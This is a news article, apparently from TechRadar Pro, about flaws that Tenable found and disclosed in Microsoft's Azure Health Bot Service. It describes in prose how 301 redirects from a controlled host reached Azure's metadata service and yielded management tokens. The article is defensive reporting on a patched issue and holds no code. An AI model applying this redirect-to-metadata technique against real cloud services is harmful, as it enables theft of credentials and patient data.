Microsoft’s AI healthcare bots might have some worrying security flaws


Microsoft’s AI-powered bots for the healthcare industry have been found to be vulnerable in a way that allowed threat actors to move across the target IT infrastructure, and even steal sensitive information.
Cybersecurity researchers Tenable, who discovered the flaws and reported them to Microsoft, outlined how the flaws in Azure Health Bot Service enabled lateral movement throughout the network, and thus access to sensitive patient data.
The Azure AI Health Bot Service is a tool enabling developers to build and deploy virtual health assistants, powered by artificial intelligence (AI). That way, healthcare orgs can cut down on cost and improve efficiency, without compromising on compliance.
Data Connections
Generally speaking, digital assistants also work with plenty of sensitive information, which makes security and data integrity paramount.
Tenable sought to analyze how the chatbot handles the workload, and found a few issues in a feature called “Data Connections”, designed to pull data from other services. The researchers pointed out that the tool does have built-in safeguards that block unauthorized access to internal APIs, but they managed to bypass them by issuing redirect responses while reconfiguring a data connection through a controlled external host.
They set up the host to respond to requests with a 301 redirect response aimed at Azure’s metadata service (IMDS). That gave them access to a valid metadata response which, in turn, gave them an access token for management.azure.com. With the token, they were able to get a list of all the subscriptions it grants access to.
A few months ago, Tenable reported its findings to Microsoft, and soon after all regions were patched. There is no evidence the flaw was exploited in the wild, it added.
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
“The vulnerabilities discussed….involve flaws in the underlying architecture of the AI chatbot service rather than the AI models themselves,” the researchers noted, adding this, “highlights the continued importance of traditional web application and cloud security mechanisms in this new age of AI powered services.”
More from TechRadar Pro
Microsoft’s AI-powered bots for the healthcare industry have been found to be vulnerable in a way that allowed threat actors to move across the target IT infrastructure, and even steal sensitive information. Cybersecurity researchers Tenable, who discovered the flaws and reported them to Microsoft, outlined how the flaws in Azure…
Recent Posts
- Hackers are targeting Signal with new QR code-linked cyberattack
- DJI’s RS 4 Mini camera stabilizer can now track moving people
- Dune: Awakening will spice things up on May 20
- GoPro unveils a much cheaper 360-degree camera, but it’s not the all-new Max 2 that we’ve been waiting for
- Among Us 3D will let you deduce from a first-person perspective
Archives
- February 2025
- January 2025
- December 2024
- November 2024
- October 2024
- September 2024
- August 2024
- July 2024
- June 2024
- May 2024
- April 2024
- March 2024
- February 2024
- January 2024
- December 2023
- November 2023
- October 2023
- September 2023
- August 2023
- July 2023
- June 2023
- May 2023
- April 2023
- March 2023
- February 2023
- January 2023
- December 2022
- November 2022
- October 2022
- September 2022
- August 2022
- July 2022
- June 2022
- May 2022
- April 2022
- March 2022
- February 2022
- January 2022
- December 2021
- November 2021
- October 2021
- September 2021
- August 2021
- July 2021
- June 2021
- May 2021
- April 2021
- March 2021
- February 2021
- January 2021
- December 2020
- November 2020
- October 2020
- September 2020
- August 2020
- July 2020
- June 2020
- May 2020
- April 2020
- March 2020
- February 2020
- January 2020
- December 2019
- November 2019
- September 2018
- October 2017
- December 2011
- August 2010